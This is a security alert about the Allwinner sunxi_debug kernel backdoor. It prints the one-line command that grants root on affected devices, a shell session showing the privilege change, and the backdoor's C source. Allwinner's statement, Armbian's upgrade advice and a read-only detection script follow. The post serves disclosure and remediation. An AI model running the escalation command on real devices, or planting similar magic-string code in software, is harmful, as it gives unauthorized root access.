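With this backdoor, any process running under any UID can apparently become root, as long as it has access to /proc, simply by running the command
echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
In other words, if a service exposed on the network meets these conditions, it may be possible to execute commands as root remotely. Here is how to check (excerpt below):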
tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
The offending code is here (excerpt below):
if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
}
The statement from Allwinner, who wrote this code, is here (excerpt below):
Allwinner Technology committed to resolving Linux Kernel software issue
Zhuhai, China - Allwinner Technology.Co.Ltd (SHE: CN:300458) is working with its device manufacturers to fix a current software issue. We are aware that code, which was supplied to device manufacturers for the purpose of developing products, should have been removed prior to shipping. We recommend that anyone who is concerned about this issue should contact the relevant device manufacturer.
In relation to the source code on Github, it is released for the open source community only and not for shipping certain devices. Since a debugging function is not needed it has subsequently been removed.
Allwinner is committed to producing quality SoC’s with security a key priority. We are currently working hard to address this issue and revising our current processes so we can continue to evolve our range of SoC’s in the future.
This can reportedly be fixed with apt-get update/upgrade, so if you are affected, apply it as soon as possible.
the fix is also in Armbian's apt repo so please upgrade now (apt-get update/upgrade or start with a fresh OS image) if you're affected!
-- From Armbian - Security Alert for Allwinner sun8i (H3/A83T/H8)
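
To confirm whether a device still exposes the interface without writing the magic string to it, a read-only check like the following can be run before and after upgrading; it also scans a kernel source tree for the string shown in the excerpt above. This is an added example, not code from the original post, Allwinner or Armbian; the function names check_sunxi_debug and scan_kernel_tree and their return codes are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: read-only checks for the sunxi_debug backdoor.
# Nothing here writes to the proc node.

# check_sunxi_debug [PROC_ROOT]   (hypothetical helper)
#   returns 0 = node absent
#           1 = node present, not world-writable
#           2 = node present and world-writable
# PROC_ROOT defaults to /proc; the parameter exists so the check can be
# exercised against a constructed test directory.
check_sunxi_debug() {
    node="${1:-/proc}/sunxi_debug/sunxi_debug"
    if [ ! -e "$node" ]; then
        echo "OK: $node not present"
        return 0
    fi
    # The 9th character of the ls mode string is the "other: write" bit.
    other_w=$(ls -ld -- "$node" | cut -c9)
    if [ "$other_w" = "w" ]; then
        echo "VULNERABLE: $node exists and is world-writable"
        return 2
    fi
    echo "WARNING: $node exists (mode $(ls -ld -- "$node" | cut -c1-10))"
    return 1
}

# scan_kernel_tree DIR   (hypothetical helper)
#   returns 0 = magic string not found, 1 = found (file paths printed)
scan_kernel_tree() {
    hits=$(grep -rl -- 'rootmydevice' "$1" 2>/dev/null) || true
    if [ -n "$hits" ]; then
        echo "FOUND backdoor string in:"
        echo "$hits"
        return 1
    fi
    echo "OK: no 'rootmydevice' string under $1"
    return 0
}

# Usage on a device:      check_sunxi_debug
# Usage on a source tree: scan_kernel_tree /path/to/kernel-source
```

A non-zero result from check_sunxi_debug after upgrading means the running kernel is still the old one; reboot into the updated kernel and run it again.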